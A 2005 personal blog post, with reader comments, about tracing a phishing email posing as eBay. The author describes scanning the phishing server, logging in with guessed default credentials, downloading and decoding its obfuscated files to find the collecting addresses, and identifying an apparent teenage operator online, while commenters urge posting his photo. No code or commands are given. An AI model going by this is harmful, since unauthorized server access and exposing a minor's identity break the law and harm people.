Sunday, June 19, 2005

Fishing For Phishers

Came home from watching Madagascar to find a poorly formatted email half-appearing to be from eBay, saying that I had to update my account details.

Gmail it seemed had already picked up on the fact that the "Return-Path:" was different to the "From:" field and had removed all the links, but I felt in the mood for a little reverse phishing. Just curious I guess, amazed at the depths some people will sink to and not wanting to imagine the floundering few that may already have been hooked.

First thing was to check the bait, the email source; found the link, taking me to a page that looked very much like an eBay page with boxes to enter credit card information and all that. The server ip was in the address, so I decided to give my Linux box a little bit of a workout, running nmap and traceroute on the ip.

I noticed the ssh and ftp ports were open and the address had /~demo/ in it, so I tried the obvious, using Putty to ssh to the server, 'demo' as the username and 'demo' as the password. I couldn't believe they would be that stupid, but evidentially they were. Seems their fishing boat had a few holes in it.

There was no shell access, but I got in through ftp and had a look around, downloaded all their fake eBay files and thought about either deleting them or editing them, but didn't. I wanted to see how much more information I could gather.

The actual files were encoded using the JavaScript 'unescape' function in an attempt to hide the source code from inquisitive fish like me. However the very long string of %3C%42%4F%44%59%20%7... is easily decoded with a tool like this. Still following the lure, I ended up at the php file that seemed to do the actual sending of the private information to the little phishermen. The mail() commands were in base64 ready to be decoded and executed by the server.

I changed the code a little and put it through my Linux server, making it only echo the base64_decode() output instead of running it. And there I had them, hook, line and sinker, the two email addresses that the credit card details were being reeled into.

Googling the names brought up information for only one of the little phishermen on a music related message board profile, a sixteen year old Eminem fan from Romania. He even had a picture.

I was satisfied at that. Fish matching wits with phishermen. The one that got away, staring into the eyes of his would be, puerile captor. Catch you next time.

Fishing at Moonlight, Kunsthistorisches Museum, Vienna


Blogger warrenzone said...

I think I got that same e-mail, I forwarded it to pay-pal. you should post the pic of the kid.

6/19/2005 05:09:00 am  
Anonymous Anonymous said...

its spellt Madagascar

dear or else

6/19/2005 09:56:00 am  
Blogger Joshua said...

Sorry Katty and/or Natty, my own personal spell checkers :) I'll get on that right away.

6/19/2005 07:42:00 pm  
Anonymous Anonymous said...

its spelt spelt. not spellt

dear or else

6/20/2005 02:42:00 pm  
Anonymous Anonymous said...

lol yarr dork

so josh has a spell checker and that spell checker has a spell checker

having 2 spell checkers is the thing of the future!

dear or else

6/20/2005 09:39:00 pm  
Anonymous Anonymous said...

Clever little hunting foray there, I'm with warrenzone, post the little gnat's picture.

6/20/2005 11:34:00 pm  
Blogger Joshua said...

Purposely didn't include any detailed info in this post. Didn't really want to get too personal with these people.

I sent the info on to eBay security, but doubt they'll do anything. Watch for his picture on Romania’s most wanted :)

6/20/2005 11:46:00 pm  
Anonymous Anonymous said...

yarr dork doesnt make sense. yarr is used as "your" or "you're" and "you are dork" doesnt make sense, it'd have to be "yarr a dork" unless, of course, you were saying "yarr" as "you" because we're pirates of the future and we can say "yarr" in any context but no one else can, and if so, then thats ok.

dear or else

6/21/2005 05:31:00 pm  

Post a Comment

<< Home